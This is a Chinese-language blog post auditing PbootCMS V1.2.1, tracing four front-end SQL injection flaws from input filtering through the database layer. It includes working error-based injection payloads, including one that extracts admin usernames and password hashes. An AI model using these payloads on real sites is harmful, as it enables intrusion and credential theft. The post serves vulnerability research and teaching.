<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/uploads/xzpq.jpg?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="代码审计," />










<meta name="description" content="之前几周复现审计文章,但是轮到自己去挖掘的时候还是两眼黑,感谢P师傅的指点,成功学习了一波,记录下来,希望自己早日进阶代码审计。    一.前期收集审计信息  1.部署CMSPbootCMS部署是很方便的,直接下载下来即可使用,但是系统默认使用sqlite的,因为笔者用mysql用的比较多,那这里我就以mysql数据库安装来跑程序。在config\database.php  然后自己创建数据库p">
<meta name="keywords" content="代码审计">
<meta property="og:type" content="article">
<meta property="og:title" content="代码审计 | PbootCMS_V1.2.1详细审计SQL注入">
<meta property="og:url" content="http://yoursite.com/2018/10/15/PbootCMS_V1.2.1详细审计SQL注入/index.html">
<meta property="og:site_name" content="P0rZ9&#39;s blog">
<meta property="og:description" content="之前几周复现审计文章,但是轮到自己去挖掘的时候还是两眼黑,感谢P师傅的指点,成功学习了一波,记录下来,希望自己早日进阶代码审计。    一.前期收集审计信息  1.部署CMSPbootCMS部署是很方便的,直接下载下来即可使用,但是系统默认使用sqlite的,因为笔者用mysql用的比较多,那这里我就以mysql数据库安装来跑程序。在config\database.php  然后自己创建数据库p">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/tfjaax218vlz4iaj05vy8m28/image_1cpp8jqdc7mrhtd8mj1f311htf19.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/57n9bc88jdbb3dfi5kyxslqu/image_1cpp8o9a954m1t1rnrhatv82k1m.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/wow4n0eyjmgjmkmlcel2lmvp/image_1cpp8s3l61169stgg4m1p271m5j2j.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/bk5dzuwptrot91ztl3ihidvu/image_1cpp986o17ian8je3v6hd17713d.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/j2gwd0qtkf9wezdhp9q7u4wz/image_1cplpaupq1u6m1sjvtrk157tksi9.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/ka58v3fqgjjbual6zb6mcq4c/image_1cpn0rgnj169h14k21ag1ulrksd9.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/2wru3avgsj3u0ykcqhjknf83/image_1cpo24s2d92r1gfl11rpq1vkj9.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/2dienx7ri5ej67imlqkos8s6/image_1cpo26dqd6r61d4l18vt1lj3190km.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/512i12ionncb6jg75lqax0b0/image_1cpo3bvr5f7j7cc2nd11vn1u92p.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/xwhvuc5mi1kmtkf75xw92quv/image_1cppm94mf134u1t061qtg1rpg9rm9.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/397nmoityn6jgrqcufb2k6g2/image_1cpo3qdm010e7kr78vm1jl6e9o1j.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/vi4grkematw263ehpl3t7cgx/image_1cpqr3p931934f811s0lfhspuk18.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/msmqe1h5bab7lemysg3zrb2l/image_1cpql0h0g1r4qia91d3l1oms6kq9.png">
<meta property="og:image" content="http://static.zybuluo.com/chhyx/lx86w77bhpkxenv0vipg9ry8/image_1cpqthi64jkb1iae1q8u1n5i1oc1l.png">
<meta property="og:updated_time" content="2018-10-15T05:51:21.701Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="代码审计 | PbootCMS_V1.2.1详细审计SQL注入">
<meta name="twitter:description" content="之前几周复现审计文章,但是轮到自己去挖掘的时候还是两眼黑,感谢P师傅的指点,成功学习了一波,记录下来,希望自己早日进阶代码审计。    一.前期收集审计信息  1.部署CMSPbootCMS部署是很方便的,直接下载下来即可使用,但是系统默认使用sqlite的,因为笔者用mysql用的比较多,那这里我就以mysql数据库安装来跑程序。在config\database.php  然后自己创建数据库p">
<meta name="twitter:image" content="http://static.zybuluo.com/chhyx/tfjaax218vlz4iaj05vy8m28/image_1cpp8jqdc7mrhtd8mj1f311htf19.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/10/15/PbootCMS_V1.2.1详细审计SQL注入/"/>





  <title>代码审计 | PbootCMS_V1.2.1详细审计SQL注入 | P0rZ9's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">P0rZ9's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/10/15/PbootCMS_V1.2.1详细审计SQL注入/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="P0rZ9">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="P0rZ9's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">代码审计 | PbootCMS_V1.2.1详细审计SQL注入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-10-15T08:15:41+08:00">
                2018-10-15
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote>
<p>之前几周复现审计文章,但是轮到自己去挖掘的时候还是两眼黑,感谢P师傅的指点,成功学习了一波,记录下来,希望自己早日进阶代码审计。</p>
</blockquote>
<hr>
<blockquote>
<p>一.前期收集审计信息</p>
</blockquote>
<p><strong>1.部署CMS</strong><br><code>PbootCMS</code>部署是很方便的,直接下载下来即可使用,但是系统默认使用<code>sqlite</code>的,因为笔者用<code>mysql</code>用的比较多,那这里我就以<code>mysql</code>数据库安装来跑程序。在<code>config\database.php</code></p>
<p><img src="http://static.zybuluo.com/chhyx/tfjaax218vlz4iaj05vy8m28/image_1cpp8jqdc7mrhtd8mj1f311htf19.png" alt="image_1cpp8jqdc7mrhtd8mj1f311htf19.png-97.3kB"></p>
<p>然后自己创建数据库<code>pbootcms</code>,导入<code>static\backup\sql\20180720164810_pbootcms.sql</code>的sql语句并执行,看到下面内容就表明数据库部署成功<br><img src="http://static.zybuluo.com/chhyx/57n9bc88jdbb3dfi5kyxslqu/image_1cpp8o9a954m1t1rnrhatv82k1m.png" alt="image_1cpp8o9a954m1t1rnrhatv82k1m.png-30.7kB"><br>然后重新打开网站 看到如下内容表明<code>PbootCMS</code>部署成功<br><img src="http://static.zybuluo.com/chhyx/wow4n0eyjmgjmkmlcel2lmvp/image_1cpp8s3l61169stgg4m1p271m5j2j.png" alt="image_1cpp8s3l61169stgg4m1p271m5j2j.png-857.4kB"></p>
<p><strong>2.分析系统整体架构:</strong></p>
<pre><code>PbootCMS-V1.2.1
├─ apps         应用程序
│  ├─ admin     后台模块
│  ├─ api       api模块
│  ├─ common    公共模块
│  ├─ home      前台模块
├─ config       配置文件
│  ├─ config.php    配置文件
│  ├─ database.php  数据库配置文件
│  ├─ route.php     用户自定义路由规则
├─ core         框架核心
│  ├─ function  框架公共函数库
│  │  ├─ handle.php 助手函数库1
│  │  ├─ helper.php 助手函数库2
├─ template     html模板
├─ admin.php    管理端入口文件
├─ api.php      api入口文件
├─ index.php    前端入口文件
</code></pre><p>这里列出一些重要的目录,可快速了解系统,有3个入口文件(<code>admin.php,api.phpi,ndex.php</code>)分别对应<code>apps</code>目录下的几个模块(<code>admin,api,home</code>)</p>
<p><strong>3.确定路由走向</strong><br>经过初步测试,路由走向主要分为自定义路由跟普通MVC模式路由模式。<br>自定义路由:<br>查看路由文件 <code>apps\common\route.php</code><br><img src="http://static.zybuluo.com/chhyx/bk5dzuwptrot91ztl3ihidvu/image_1cpp986o17ian8je3v6hd17713d.png" alt="image_1cpp986o17ian8je3v6hd17713d.png-121kB"></p>
<p>举个例子:</p>
<pre><code>http://127.0.0.1/index.php/list/11
</code></pre><p>经过上面系统自定义路由解析后访问的是</p>
<pre><code>http://127.0.0.1/home/list/index/scode/11
</code></pre><p>定位:<code>home</code>模块<code>list</code>控制器<code>index</code>方法<code>scode</code>参数</p>
<p>普通MVC模式:<br>对于上面没有自定义的路由规则来说,直接按照MVC模式访问即可<br>例如:</p>
<pre><code>http://127.0.0.1:89/index.php/Message/add
</code></pre><p>定位:<code>apps\home\controller\MessageController.php</code>的<code>add()</code>方法</p>
<p><strong>4.系统参数过滤情况</strong><br>a.原生态的<code>GET,POST,REQUEST</code>过滤情况<br>找一处外部可访问的地方按如下方式测试即可:<br><img src="http://static.zybuluo.com/chhyx/j2gwd0qtkf9wezdhp9q7u4wz/image_1cplpaupq1u6m1sjvtrk157tksi9.png" alt="image_1cplpaupq1u6m1sjvtrk157tksi9.png-112.5kB"></p>
<p>根据浏览器输出我们可知原生态的获取数据方式是完全不过滤的</p>
<p>b.系统自带函数<code>get,post,request,cookie</code>过滤情况:</p>
<pre><code>#core\function\help.php
function get(
function post(
function request(
function cookie(
</code></pre><p>这里前3个函数都会调用<code>filter()</code>进行过滤,<code>filter()</code>会调用<code>escape_string()</code>函数,<code>Cookie</code>是直接进行<code>escape_string()</code>过滤</p>
<pre><code>#core\functionhandle.php
function escape_string($string, $dropStr = true)
{
    if (! $string)
        return $string;
    if (is_array($string)) { // 数组处理
        foreach ($string as $key =&gt; $value) {
            $string[$key] = escape_string($value);
        }
    } elseif (is_object($string)) { // 对象处理
        foreach ($string as $key =&gt; $value) {
            $string-&gt;$key = escape_string($value);
        }
    } else { // 字符串处理
        if ($dropStr) {
            $string = preg_replace(&apos;/(0x7e)|(0x27)|(0x22)|(updatexml)|(extractvalue)|(name_const)|(concat)/i&apos;, &apos;&apos;, $string);
        }
        $string = htmlspecialchars(trim($string), ENT_QUOTES, &apos;UTF-8&apos;);
        $string = addslashes($string);
    }
    return $string;
}
</code></pre><p>根据代码我们可以看到<br>0x1.首先这里经过了<code>preg_replace</code>正则匹配,对一些敏感词汇进行了过滤<br>0x2.<code>htmlspecialchars()</code>函数html实体编码(单双引号都过滤)<br>0x3.<code>addslashes()</code>函数转义</p>
<p>注意:<br>这里的过滤只针对<code>value</code>而<code>key</code>完全无过滤<br>正则绕过很简单,只需要<code>updateupdatexmlxml</code>即可绕过</p>
<p>因为这里绕过<code>html编码</code>与<code>addslashes()</code>函数而进行sql注入不现实<br>所以我们将重点放在key上面</p>
<p><strong>5.了解系统DB类,数据库底层的操作方法</strong><br>这里涉及代码太多,我们只需要对一些关键的地方进行了解即可</p>
<pre><code>#PbootCMS\core\basic\Model.php
</code></pre><p>通过读DB底层操作代码发现这里大部分都是字符串拼接,只要可以带入’或<code>即可注入。因为在value处注入不现实,现在我们把重点放在可控的数组上--&gt;寻找参数可为数组且用</code>key`直接拼接的操作方法</p>
<p>这里找到 <code>table()  name() field() where() order() insert() insertGetId() (调用的insert方法)  update()</code>等具有“漏洞”的操作</p>
<blockquote>
<p><strong>二.漏洞寻找及利用</strong></p>
</blockquote>
<p>这里咱们咱们重点关注前台sql注入<br>搜索方法:<br>  <strong>0x01.</strong>在<code>home\controller</code>中查找直接调用上述操作方法的函数—&gt;构建<code>sql</code><br>  <strong>0x02.</strong>在<code>home\model</code>查找调用上述操作方法的函数<code>a()</code>–&gt;返回<code>home\controller</code>中再次寻找调用<code>a()</code>函数的方法—&gt;构建<code>sql</code><br>  <strong>0x03.</strong>在公共函数库<code>apps\common</code>查找调用上述操作方法的函数<code>b()</code>–&gt;返回<code>home\controller</code>中寻找调用<code>b()</code>函数的方法—&gt;构建<code>sql</code></p>
<p>经过上面的前期审计分析,我们心中已经有了*数,接下来就是调试构造即可,这里就以实际挖掘的过程来讲解吧。</p>
<p>##<strong>1.Insert 注入一</strong><br><strong>代码分析:</strong><br>笔者本地测试关闭了验证码的验证,在实战中利用填写正确的验证码即可。<br>搜索<code>insert()</code>–&gt;在<code>home\model\ParserModel.php</code>找到<code>addMessage()</code>函数调用了<code>insert()</code>操作</p>
<pre><code>public function addMessage($data)
{
    return parent::table(&apos;ay_message&apos;)-&gt;autoTime()-&gt;insert($data);
}
</code></pre><p>我们在搜索下<code>home\controller</code>哪里调用了<code>addMessage()</code>函数,在<code>MessageController.php</code>找到<code>add()</code>方法:</p>
<pre><code>public function add()
    {
        if ($_POST) {
        ...
        // 接收数据
        $mail_body = &apos;&apos;;
        foreach ($form as $value) {
            $field_data = post($value-&gt;name);
            if (is_array($field_data)) { // 如果是多选等情况时转换
                $field_data = implode(&apos;,&apos;, $field_data);
            }
            if ($value-&gt;required &amp;&amp; ! $field_data) {
                alert_back($value-&gt;description . &apos;不能为空！&apos;);
            } else {
                $data[$value-&gt;name] = post($value-&gt;name);
                $mail_body .= $value-&gt;description . &apos;：&apos; . post($value-&gt;name) . &apos;&lt;br&gt;&apos;;
            }
        }
        ...

        if ($this-&gt;model-&gt;addMessage($data)) {
            ...
        }
    }
</code></pre><p>这里的<code>$data[$value-&gt;name] = post($value-&gt;name);</code>表明将POST提交的数组直接赋值给<code>$data</code>–&gt;进入<code>addmessage()---&gt;inert()</code> 造成注入。</p>
<p><strong>payload:</strong></p>
<pre><code>url: http://127.0.0.1:89/index.php/Message/add
POST: contacts[id`) values (1 and updatexml(1,concat(0x7e,user(),1),1)); -- a]=1&amp;content=1&amp;mobile=1
</code></pre><p><strong>漏洞利用:</strong><br><img src="http://static.zybuluo.com/chhyx/ka58v3fqgjjbual6zb6mcq4c/image_1cpn0rgnj169h14k21ag1ulrksd9.png" alt="image_1cpn0rgnj169h14k21ag1ulrksd9.png-120.3kB"></p>
<p>##<strong>2.Insert 注入二</strong><br>注意:本地测试时,需要添加一条数据才能注入,真实环境下,如果开放这个通话功能时即可直接注入<br><strong>代码分析:</strong><br>A.这里继续寻找在<code>home\Model</code>中寻找调用<code>insert</code>操作的函数,发现函数<code>addForm()</code></p>
<pre><code>#home\Model\ParserModel.php  addForm()
public function addForm($table, $data)
{
    return parent::table($table)-&gt;insert($data);
}
</code></pre><p>我们在搜索下<code>home\controller</code>中调用<code>addForm()</code>函数的方法,在<code>FormController.php</code>找到<code>add()</code>方法:</p>
<pre><code>#home\controller\FormController.php add()
public function add()
{
    if ($_POST) {
        ...
    if ($fcode == 1) {
            alert_back(&apos;表单提交地址有误，留言提交请使用留言专用地址!&apos;);
        }
        ...
    if (! $form = $this-&gt;model-&gt;getFormField($fcode)) {
        alert_back(&apos;接收表单不存在任何字段，请核对后重试！&apos;);
    }
    foreach ($form as $value) {
        $field_data = post($value-&gt;name);
        if (is_array($field_data)) { // 如果是多选等情况时转换
            $field_data = implode(&apos;,&apos;, $field_data);
            }
        if ($value-&gt;required &amp;&amp; ! $field_data) {
            alert_back($value-&gt;description . &apos;不能为空！&apos;);
        } else {
            $data[$value-&gt;name] = post($value-&gt;name);
            $mail_body .= $value-&gt;description . &apos;：&apos; . post($value-&gt;name) . &apos;&lt;br&gt;&apos;;
            }
        }
        ...
    if ($this-&gt;model-&gt;addForm($value-&gt;table_name, $data)) {
</code></pre><p>跟进<code>getFormField()</code>查看:</p>
<pre><code>    public function getFormField($fcode)
{   ...
    return parent::table(&apos;ay_form a&apos;)-&gt;field($field)
        -&gt;where(&quot;a.fcode=&apos;$fcode&apos;&quot;)
        -&gt;join($join)
        -&gt;order(&apos;b.sorting ASC,b.id ASC&apos;)
        -&gt;select();
}
</code></pre><p><code>fcode</code>为<code>ay_form</code>表的一个字段,只要<code>fcode</code>为2的字段存在即可注入<br>这里的<code>$data[$value-&gt;name] = post($value-&gt;name);</code>表明将<code>POST</code>提交的数组直接赋值给<code>$data--&gt;addForm()---&gt;inert()</code> 造成注入。</p>
<p><strong>payload:</strong></p>
<pre><code>url: http://127.0.0.1:89/index.php/Form/add?fcode=2
POST: tel[id`) values (1 and updatexml(1,concat(0x7e,user()),1)); -- a]=12
</code></pre><p><strong>漏洞利用：</strong><br>要完成漏洞利用,需要在数据库中添加一个字段使得<code>fcode</code>为2<br>我们在后台新增一个表单:<br><img src="http://static.zybuluo.com/chhyx/2wru3avgsj3u0ykcqhjknf83/image_1cpo24s2d92r1gfl11rpq1vkj9.png" alt="image_1cpo24s2d92r1gfl11rpq1vkj9.png-62.4kB"></p>
<p>新增一个字段:<br><img src="http://static.zybuluo.com/chhyx/2dienx7ri5ej67imlqkos8s6/image_1cpo26dqd6r61d4l18vt1lj3190km.png" alt="image_1cpo26dqd6r61d4l18vt1lj3190km.png-66.3kB"><br><img src="http://static.zybuluo.com/chhyx/512i12ionncb6jg75lqax0b0/image_1cpo3bvr5f7j7cc2nd11vn1u92p.png" alt="image_1cpo3bvr5f7j7cc2nd11vn1u92p.png-226.7kB"></p>
<p>数据库:<br><img src="http://static.zybuluo.com/chhyx/xwhvuc5mi1kmtkf75xw92quv/image_1cppm94mf134u1t061qtg1rpg9rm9.png" alt="image_1cppm94mf134u1t061qtg1rpg9rm9.png-283.3kB"></p>
<p>注入:<br><img src="http://static.zybuluo.com/chhyx/397nmoityn6jgrqcufb2k6g2/image_1cpo3qdm010e7kr78vm1jl6e9o1j.png" alt="image_1cpo3qdm010e7kr78vm1jl6e9o1j.png-362.4kB"></p>
<p>##<strong>3.主页处注入</strong><br><strong>代码分析:</strong><br>A.这里继续寻找在<code>home\Model</code>中寻找调用<code>where</code>操作的函数<br>找到2处<code>getList</code>与<code>getSpecifyList</code>,两处的利用点都在<code>where</code>操作里:</p>
<pre><code>public function getList($scode, $num, $order, $filter = array(), $where = array(), $fuzzy = true)
{
    ...
    return parent::table(&apos;ay_content a&apos;)-&gt;field($fields)
        -&gt;where($where1, &apos;OR&apos;)
        -&gt;where($where2)    //触发点
        -&gt;where($where, &apos;AND&apos;, &apos;AND&apos;, $fuzzy)
    ...
}
</code></pre><p>-</p>
<pre><code>public function getSpecifyList($scode, $num, $order, $filter = array(), $where = array(), $fuzzy = true)
{
    ...
    return parent::table(&apos;ay_content a&apos;)-&gt;field($fields)
        -&gt;where($where1, &apos;OR&apos;)
        -&gt;where($where2) //触发点
        -&gt;where($where, &apos;AND&apos;, &apos;AND&apos;, $fuzzy)
        ...
}
</code></pre><p>B.我们再搜索下<code>home\controller</code>中调用<code>getList()</code>或<code>getSpecifyList（）</code>函数的方法,在<code>ParserController.php</code>找到<code>parserSpecifyListLabel()</code>方法:</p>
<pre><code>public function parserSpecifyListLabel($content)
{
    $pattern = &apos;/\{pboot:list(\s+[^}]+)?\}([\s\S]*?)\{\/pboot:list\}/&apos;;
    $pattern2 = &apos;/\[list:([\w]+)(\s+[^]]+)?\]/&apos;;
    if (preg_match_all($pattern, $content, $matches)) {
        $count = count($matches[0]);
        for ($i = 0; $i &lt; $count; $i ++) {
            // 获取调节参数
            $params = $this-&gt;parserParam($matches[1][$i]);
            ...
            // 数据筛选
            $where2 = array();
            foreach ($_GET as $key =&gt; $value) {//漏洞触发点
                if (substr($key, 0, 4) == &apos;ext_&apos;) { // 其他字段不加入
                    $where2[$key] = get($key); 
                }
            } 
            ...
            // 读取数据
            //5 4   date DESC,sorting ASC,id DESC  array(0)
            if ($page) {
                $data = $this-&gt;model-&gt;getList($scode, $num, $order, $where1, $where2);
            } else {
                $data = $this-&gt;model-&gt;getSpecifyList($scode, $num, $order, $where1, $where2);
            }
</code></pre><p>C.阅读代码先判断GET传输过来的<code>key</code>值前4位是否为<code>ext_</code>(扩展字段),如果是的话,直接赋值给<code>$where2</code>,然后进入读取数据操作,调用<code>getList</code>或<code>getSpecifyLis</code><br>触发注入。</p>
<p>D.我们追溯调用该<code>parserSpecifyListLabel()</code>函数的方法:<br> <code>parserSpecifyListLabel()---&gt;parserAfter()---&gt;index(IndexController.php)</code> 查看该index函数:</p>
<pre><code>public function index()
{
    $content = parent::parser(&apos;index.html&apos;); // 框架标签解析
    ...
    $content = $this-&gt;parser-&gt;parserAfter($content); // CMS公共标签后置解析   跟进这个方法
    $this-&gt;cache($content, true);
}
</code></pre><p>这里逻辑就很清楚了,利用系统解析list标签下的ext扩展字段来进行注入。<br>这里key值为任意扩展字段(<code>ext_price ext_type ext_color</code>)即可:<br><img src="http://static.zybuluo.com/chhyx/vi4grkematw263ehpl3t7cgx/image_1cpqr3p931934f811s0lfhspuk18.png" alt="image_1cpqr3p931934f811s0lfhspuk18.png-106.9kB"></p>
<p>漏洞涉及文件:</p>
<pre><code>IndexController.php的index()---&gt;parserAfter()---&gt;parserSpecifyListLabel()--&gt;getList()/getSpecifyList()---&gt;where() 
</code></pre><p>直接拼接key造成注入</p>
<p><strong>漏洞利用:</strong><br>因为系统会将空格转化为_ 我们可用/**/来绕过。</p>
<pre><code>payload: http://127.0.0.1:89/index.php?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,username,0x23,password)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123
</code></pre><p>因为updatexml的最大长度为32位,所以在查询password时会显示不全,我们在实战过程中可以单独读取password字段或者利用其他函数注入即可。这个之后文章讨论。</p>
<p>注入:<br><img src="http://static.zybuluo.com/chhyx/msmqe1h5bab7lemysg3zrb2l/image_1cpql0h0g1r4qia91d3l1oms6kq9.png" alt="image_1cpql0h0g1r4qia91d3l1oms6kq9.png-216.5kB"></p>
<p>##<strong>4.搜索处注入</strong><br>代码分析:<br>A.我们继续搜索<code>home\controller</code>中调用<code>getList()</code>或<code>getSpecifyList（）</code>函数的方法,在<code>ParserController.php</code>找到<code>parserSearchLabel()</code>方法。</p>
<pre><code>public function parserSearchLabel($content)
{
    $pattern = &apos;/\{pboot:search(\s+[^}]+)?\}([\s\S]*?)\{\/pboot:search\}/&apos;;
    $pattern2 = &apos;/\[search:([\w]+)(\s+[^]]+)?\]/&apos;;
    ...
            // 存储搜索条件，条件为“并列”关系，由于为模糊匹配，条件为空时意味着“任意”
            $where2 = array();
    ...

            // 数据接收
            foreach ($_GET as $key =&gt; $value) {
                if (! ! $value = get($key, &apos;vars&apos;)) {
                    $where2[$key] = $value;//key 可控
                }
            }
    ...
            // 读取数据
            if (! $data = $this-&gt;model-&gt;getList($scode, $num, $order, $where1, $where2, $fuzzy)) {
            ...
</code></pre><p>这里代码逻辑:将<code>GET</code>传输过来的字段直接赋值给<code>where2</code>数组 接着进入<code>getList()</code>方法 造成注入</p>
<p>B.然后同上,搜索<code>home\controller</code>中调用<code>parserSearchLabel()</code>的方法,我们追溯调用该<code>parserSearchLabel()</code>函数的方法:<br> <code>parserSearchLabel()---&gt;index(SearchController.php)</code> 查看该index函数:</p>
<pre><code>public function index()
{
    $content = parent::parser(&apos;search.html&apos;); // 框架标签解析
    ...
    $content = $this-&gt;parser-&gt;parserSearchLabel($content); // 搜索结果标签    跟进这个地方
    ...
}
</code></pre><p>这里逻辑就很清楚了,利用系统解析<code>search</code>标签字段而对<code>get</code>传输进来的参数无有效过滤造成注入。</p>
<p>C.涉及文件:</p>
<pre><code>SearchController.php的index()---&gt;parserSearchLabel()--&gt;getList()/getSpecifyList()---&gt;where() 
</code></pre><p><strong>漏洞利用:</strong></p>
<pre><code>payload: http://127.0.0.1:89/index.php/search?updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,username,0x23,password)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123
</code></pre><p>注入:<br><img src="http://static.zybuluo.com/chhyx/lx86w77bhpkxenv0vipg9ry8/image_1cpqthi64jkb1iae1q8u1n5i1oc1l.png" alt="image_1cpqthi64jkb1iae1q8u1n5i1oc1l.png-144.6kB"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/代码审计/" rel="tag"># 代码审计</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/10/12/mysql基础命令/" rel="next" title="mysql基础命令">
                <i class="fa fa-chevron-left"></i> mysql基础命令
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/10/15/SQL注入基础/" rel="prev" title="基础知识 | SQL注入基础">
                基础知识 | SQL注入基础 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">P0rZ9</p>
              <p class="site-description motion-element" itemprop="description">找回当年那个被寄予厚望的自己</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">51</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">P0rZ9</span>

  
</div>












        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
